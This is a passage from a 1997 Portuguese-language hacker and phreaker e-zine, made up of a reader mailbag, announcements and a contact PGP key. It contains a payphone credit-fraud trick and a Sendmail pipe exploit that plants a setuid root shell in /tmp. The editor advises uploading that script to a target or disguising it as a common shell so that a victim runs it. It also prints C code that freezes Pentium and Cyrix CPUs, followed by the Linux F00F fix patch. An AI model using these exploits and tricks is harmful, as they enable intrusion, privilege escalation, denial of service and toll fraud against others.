          ele nao come os creditos, mas esse BUG foi corrigido nos orelhoes
          mais novos. A unica coisa q consegui foi aumentar o cartao um credi-
          to com o zero. Eh o seguinte, vc disca qualquer numero ex. 145.
          Aih quando atender vc aperta o zero. A liga‡ao vai cair por causa
          do BUG "corrigido", mas com tentativas sucessivas sempre vai acusar
          um credito a mais quando vc retirar o cartao.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bem, visitei sua homePage, ate fiz alguns ftp's, gostaria de ficar por 
   dentro do que voce pretende....Meu Nick e Zero Cool, meu e-mail eh 
   ???????@?????????.???.??, aguardo resposta, quem sabe eu possa te 
   ajudar.....>:-> 


RESPOSTA: Legal...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


   Fala ai grande, me chame de Giri Hawk! 
   Tipo um aviso: por favor nao mande reply dessa msg, pois soh estou 
   podendo mandar mail por esse endereco, nao receber, para me mandar mail 
   tente: ?????@??????.???. 

   Bom, tenho uma pagina: http://www.geocities.com/CapeCanaveral/9664 

   La estou reformulando algumas coisas e pretendo abrir uma area 
   brasileira, para utils em portugues, links e vou colocar sua zine e 
   muitas outras. 

   Uma ajuda q queria e ninguem e nenhum zine ou txt me ajudou foi a 
   seguinte: 

   1- Antes d tudo, nao sou hacker! 
   ******************************** 
   Um cara q parecia q iria me ajudar, pelo jeito esta fazendo o conhecido 
   cu doce e eu nao tenho muita paciencia, eu jah li uma pancada d coisas e 
   nao entendo as seguintes coisas: 

   Tipo eu peguei um xploit q vou colar aki!: 

   BUG : Sendmail version 5.65? 

   A sample sessions follows. 

   ---cut here 
   [panix!jhawk] |% telnet panix.com 25 

   Tryin 198.7.0.2 ... 
   Connected to panix.com 
   Escape character is '^]'. 

   220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 
   19:41:13 

   -0500 

   HELO 

   250 Hello panix.com, why do you call yourself ? 

   MAIL FROM: |/usr/ucb/tail|/usr/bin/sh 

   250 |/usr/ucb/tail|/usr/bin/sh... Sender ok 

   RCPT TO: root 

   250 root... Recipient ok 

   DATA 

   354 Enter mail, end with @.@ on a line by itself 

   From: jhawk"panix.com (John Hawkinson) 

   To: jhawk"panix.com (John Hawkinson) 

   Return-Receipt-To: |foobar 

   Subject: This is a large hole in the ground. 

   X-Disclaimer: We take no responsibility for what might happen 





   Hi there. Wanna play ball? 











   #!/bin/sh 

   #The above line is just in case :-) 

   echo This is a Serious Bug > /tmp/bug 

   echo id reports: >> /tmp/bug 

   /usr/bin/id >> /tmp/bug 

   echo Fixing this would be good >> /tmp/bug 

   cp /bin/sh /tmp/bugshell 

   chmod u+s /tmp/bugshell 

   echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug 

   chmod ugo+rx /tmp/bugshell 

   -------------------------------------------------------------------- 
   Entao o que nao entendi foi o seguinte: 

   Esse seria um bug no sendmail, mas para eu poder utilizar desse bug eu 
   tenho q ter uma conta shell no provedor bugoso? 

   E se tiver q ter uma conta shell no provedor, entao como eu faria para 
   conseguir uma ? Eu to com Linux e Win95, qdo eu conectei com meu Linux, 
   o cara entrou na minha maquina rapidinho, e ele nao tinha uma conta 
   shell, e pelo netstat e ele me falava q estava no sendmail!??? 
   Poderia me ajudar? Vc tb poderia colocar a resposta, coisa e tal no 
   zine, q por sinal eh bom mesmo, achei melhor q um quebra d sigilo q li! 

   Obrigado.... Giri Hawk (Nao c esqueca d nao dar 
   reply pra esse endereco, e sim para o ????@??????.???) 

   
RESPOSTA: Esta eh uma fonte de um script para maquinas q rodem o sendmail.
          O q esse script faz eh tirar proveito de um bug existente no send-
          mail. Para roda-lo vc precisa fazer um upload do arquivo para a
          maquina q quer atacar, e executar por si proprio, ou substituir por
          um shell bastante usado, assim vc vai ter certeza q alguem ira roda-
          lo. Para mais informa‡oes sobre shells e uploads, leia a materia
          neste zine: "INTRODU€AO AO HACKING". E continue sempre acompanhando
          as edi‡oes do e-zine, no proximo eu coloco algo sobre programa‡ao em
          shell...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

   Vi q precisa de colabora‡ao e eu estou a disposi‡ao de ajudar !!! 
   Apenas diga o q quer... 
   hacker, pheacker, Internet etc. 

   e' so dizer o q vc preciza. 

   t+ 

   Vi q precisa de colaboração e eu estou a disposição de ajudar !!!
   Apenas diga o q quer...
   hacker, pheacker, Internet etc.
    
   É só dizer o q vc preciza.
    
   t+

RESPOSTA: Como eu jah falei, bom acho q todos sabem o q eh bom pro zine, nin-
          guem nasceu ontem...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

gostaria de ser avisado quando o site ‚ atualisado e receber o e-zine.
valeu!!!!!!!!!!!!!!

--------------------------WAGNER ELIAS---------------------------------------
-----------------------??????@????????.???.??--------------------------------
------=_NextPart_000_01BD0693.BE639B80
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

gostaria de = ser avisado quando o site =E9 atualisado e receber o = e-zine.
valeu!!!!!!!!!!!!!!

-------------------------WAGN= ER ELIAS------------------------------------------
-------------------nevatel@informatec.com.br--------= ------------------------

RESPOSTA: Ei, jah esta dificil de responder a todas as cartas, ainda mais man- dar um monte de mail toda hora, nem pensar. PS.: Acho q vc deve treinar mais na hora de mandar mail com trechos em HTML. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Falai Fera, Gostei muito de sua HP, Vi muito poucas, que de uma forma tao simples, passasse tanta informa‡ao de um nivel consideravel. ps. Breve estarei novamente com a minha HP na NET ( a sacana da geocities a tirou do ar depois de tres anos coletando dados na NET), colocarei um link pra sua. Assim q estiver reformada lhe mando um e-mail. um grande []. W@cKy! RESPOSTA: Valeu! :) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gostaria q vc me mandasse os zines por e-mail , pois estou com problema p/ fazer o dowload, conto com vc, obrigado !!! obs: preciso muito das revistas!!! RESPOSTA: Nao. Nao mando nada pra ninguem. Pegue na HP q ta funcionando bem, e se vc nao puder pq seu pai pos um Cybersitter no seu Explorer 4.0, procure no IRC com alguem... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gostei de seus arquivos HACKERS Aonde vc os encontrou? Vc sabe telefones de acesso de algumas BBS(s) de Sao Paulo? RESPOSTA: Considerando a data da mensagem, pude notar q estes arquivos HACKERS q ele esta dizendo, sao os zines da pagina antiga... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= December, 1997 - MaNdR’Ck - Hack and Phreak Zine °±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²± X - ANUNCIOS E PUBLICA€OES ************************** Esta parte esta reservada para aqueles q desejam ter o endere‡o de sua home page, telefone da BBS, e outras coisas, como comunicados de encontros no IRC e coisas do genero. Eu acho estranho q abrindo um espa‡o desses ninguem quer publicar nada, nao sei se eh medo ou o que, mas mesmo assim esta area continua... FreeLand Zine, by Andre S. Barbosa. Home Page: http://www.infolink.com.br/~andresb/hacker.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Hack and Phreak Zine mIRC channel Nosso canal de mIRC estah operante 100% !!! irc.magiclink.com.br #hackphr Lah vc vai encontrar todo tipo de gente p/ troca de informa‡oes 24 hs por dia. Pode marcar encontroes. Fiquem ligados para encontros de editores do e-zine e futuros membros do grupo Hack and Phreak. Atenciosamente, Hack and Phreak Team =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- December, 1997 - Hack and Phreak Zine Team °±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²± XI - CONTATANDO OS AUTORES ************************** Soh use o PGP se o assunto for Underground, mas se for soh comentarios, sugestoes, criticas, e essas coisas, nem se incomoda. Type Bits/KeyID Date User ID pub 1024/A236997D 1997/10/24 MaNdRaCk -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQCNAzRRBvsAAAEEANLxPF+C/i4WsgKCIctJJEIHRKbYlS3+Wl9Zr2+XWEnN4IeF 2bInC3BR+gMGKqVdzo3cWjvyyi/QnrzhR1HmTlkleNlPPbe/TMW1lYasBW66A9G/ vQoUgVCuCbLQUxdRmcNWnXEB6gRewVftCjfNfvXoI11XPopdqPcda8aiNpl9AAUR tBtNYU5kUmFDayA8bWFuZHJhY2tAdXNhLm5ldD6JAJUDBRA0UQb79x1rxqI2mX0B AfSwA/4/FAHPxuCSAdTY9Kdul6EKbaYf2tHDNd0NIpNqrjTiJ3oiVaPiQUR6eMlv ei1CkNFbAe2tRgWIoucUyOjX6ZTijaB9Fd1mBbAuZStuArL9kSGXzkHoEJZYwyRU dv6DY8s+0C3om3BoF05lVn/mcgnmdsMFs8d+EeXY/R0EzL4RZg== =tkyG -----END PGP PUBLIC KEY BLOCK----- Pra lembrar o e-mail: MaNdR’Ck: mandrack@usa.net Cebol@: cebola_br@hotmail.com Valeu galera... December, 1997 - Hack and Phreak Zine Team °±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²± XII - BRINDE: EXPLOIT PARA MICROS PENTIUM ***************************************** Este exploit funciona da seguinte maneira: Se vc tentar executar F0, 0F, C7, C8 em um P5, a maquina vai simplesmente travar. Ela trava em qualquer SO, como Windows NT 4.0, Linux, etc. Este exploit nao funcionara em CPUs Pentium Pro, Pentium II, AMD K6 e Cyrix 6x86. Code by whiz */ char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; main () { void (*f)() = x; f(); } ---------------------------------------------------------------------------- For Cyrix 6x86 Processors: static unsigned char c[4] = {0x36, 0x78, 0x38, 0x36}; main() { asm ("movl $c, %ebx\n\t" "again: xchgl (%ebx), %eax\n\t" "movl %eax, %edx\n\t" "jmp again\n\t"); } ---------------------------------------------------------------------------- This are the relevant parts of the linux kernel 2.1.63 patch that fix the Pentium bug that Alan mentioned. Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 diff -u --recursive --new-file v2.1.62/linux/arch/i386/kernel/setup.c linux/arch/i386/kernel/setup.c --- v2.1.62/linux/arch/i386/kernel/setup.c Tue Sep 23 16:48:46 1997 +++ linux/arch/i386/kernel/setup.c Wed Nov 12 11:09:56 1997 @@ -42,6 +42,7 @@ char x86_mask = 0; /* set by kernel/head.S */ int x86_capability = 0; /* set by kernel/head.S */ int fdiv_bug = 0; /* set if Pentium(TM) with FP bug */ +int pentium_f00f_bug = 0; /* set if Pentium(TM) with F00F bug */ int have_cpuid = 0; /* set if CPUID instruction works */ char x86_vendor_id[13] = "unknown"; @@ -359,6 +360,7 @@ "fdiv_bug\t: %s\n" "hlt_bug\t\t: %s\n" "sep_bug\t\t: %s\n" + "pentium_f00f_bug\t\t: %s\n" "fpu\t\t: %s\n" "fpu_exception\t: %s\n" "cpuid\t\t: %s\n" @@ -367,6 +369,7 @@ CD(fdiv_bug) ? "yes" : "no", CD(hlt_works_ok) ? "no" : "yes", sep_bug ? "yes" : "no", + pentium_f00f_bug ? "yes" : "no", CD(hard_math) ? "yes" : "no", (CD(hard_math) && ignore_irq13) ? "yes" : "no", diff -u --recursive --new-file v2.1.62/linux/arch/i386/kernel/traps.c linux/arch/i386/kernel/traps.c --- v2.1.62/linux/arch/i386/kernel/traps.c Sun Sep 7 13:10:42 1997 +++ linux/arch/i386/kernel/traps.c Wed Nov 12 11:09:56 1997 @@ -413,6 +413,51 @@ #endif /* CONFIG_MATH_EMULATION */ +static struct +{ + short limit __attribute__((packed)); + void * addr __attribute__((packed)); + short __pad __attribute__((packed)); +} idt_d; + +void * idt2; + +__initfunc(void trap_init_f00f_bug(void)) +{ + pgd_t * pgd; + pmd_t * pmd; + pte_t * pte; + unsigned long twopage; + + printk("moving IDT ... "); + + twopage = (unsigned long) vmalloc (2*PAGE_SIZE); + + idt2 = (void *)(twopage + 4096-7*8); + + memcpy(idt2,&idt,sizeof(idt)); + + idt_d.limit = 256*8-1; + idt_d.addr = idt2; + idt_d.__pad = 0; + + __asm__ __volatile__("\tlidt %0": "=m" (idt_d)); + + /* + * Unmap lower page: + */ + pgd = pgd_offset(current->mm, twopage); + pmd = pmd_offset(pgd, twopage); + pte = pte_offset(pmd, twopage); + + pte_clear(pte); + flush_tlb_all(); + + printk(" ... done\n"); +} + + + __initfunc(void trap_init(void)) { int i; diff -u --recursive --new-file v2.1.62/linux/arch/i386/mm/fault.c linux/arch/i386/mm/fault.c --- v2.1.62/linux/arch/i386/mm/fault.c Wed Oct 15 16:04:23 1997 +++ linux/arch/i386/mm/fault.c Wed Nov 12 11:09:55 1997 @@ -74,6 +74,25 @@ return 0; } +asmlinkage void divide_error(void); +asmlinkage void debug(void); +asmlinkage void nmi(void); +asmlinkage void int3(void); +asmlinkage void overflow(void); +asmlinkage void bounds(void); +asmlinkage void invalid_op(void); + +asmlinkage void do_divide_error (struct pt_regs *, unsigned long); +asmlinkage void do_debug (struct pt_regs *, unsigned long); +asmlinkage void do_nmi (struct pt_regs *, unsigned long); +asmlinkage void do_int3 (struct pt_regs *, unsigned long); +asmlinkage void do_overflow (struct pt_regs *, unsigned long); +asmlinkage void do_bounds (struct pt_regs *, unsigned long); +asmlinkage void do_invalid_op (struct pt_regs *, unsigned long); + +extern int * idt2; +extern int pentium_f00f_bug; + /* * This routine handles page faults. It determines the address, * and the problem, and then passes it off to one of the appropriate @@ -170,6 +189,46 @@ goto out; } + printk("<%p/%p>\n", idt2, (void *)address); + /* + * Pentium F0 0F C7 C8 bug workaround: + */ + if ( pentium_f00f_bug && (address >= (unsigned long)idt2) && + (address < (unsigned long)idt2+256*8) ) { + + void (*handler) (void); + int nr = (address-(unsigned long)idt2)/8; + unsigned long low, high; + + low = idt[nr].a; + high = idt[nr].b; + + handler = (void (*) (void)) ((low&0x0000ffff) | (high&0xffff0000)); + printk("\n"); + goto out; + } + /* Are we prepared to handle this kernel fault? */ if ((fixup = search_exception_table(regs->eip)) != 0) { printk(KERN_DEBUG "%s: Exception at [<%lx>] cr2=%lx (fixup: %lx)\n", @@ -193,6 +252,7 @@ flush_tlb(); goto out; } + if (address < PAGE_SIZE) printk(KERN_ALERT "Unable to handle kernel NULL pointer dereference"); else diff -u --recursive --new-file v2.1.62/linux/include/asm-i386/bugs.h linux/include/asm-i386/bugs.h --- v2.1.62/linux/include/asm-i386/bugs.h Thu Sep 11 09:02:24 1997 +++ linux/include/asm-i386/bugs.h Wed Nov 12 11:09:55 1997 @@ -166,6 +166,32 @@ } } +/* + * All current models of Pentium and Pentium with MMX technology CPUs + * have the F0 0F bug, which lets nonpriviledged users lock up the system: + */ + +extern int pentium_f00f_bug; + +__initfunc(static void check_pentium_f00f(void)) +{ + /* + * Pentium and Pentium MMX + */ + printk("checking for F00F bug ..."); + if(x86==5 && !memcmp(x86_vendor_id, "GenuineIntel", 12)) + { + extern void trap_init_f00f_bug(void); + + printk(KERN_INFO "\nIntel Pentium/[MMX] F0 0F bug detected - turning on workaround.\n"); + pentium_f00f_bug = 1; + trap_init_f00f_bug(); + } else { + printk(KERN_INFO " no F0 0F bug in this CPU, great!\n"); + pentium_f00f_bug = 0; + } +} + __initfunc(static void check_bugs(void)) { check_tlb(); @@ -173,5 +199,6 @@ check_hlt(); check_popad(); check_amd_k6(); + check_pentium_f00f(); system_utsname.machine[1] = '0' + x86; } °±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²± _-~-__-~-__-~-__-~-__-~-__-~-_END OF DOCUMENT_-~-__-~-__-~-__-~-_~-__-~-__-~-_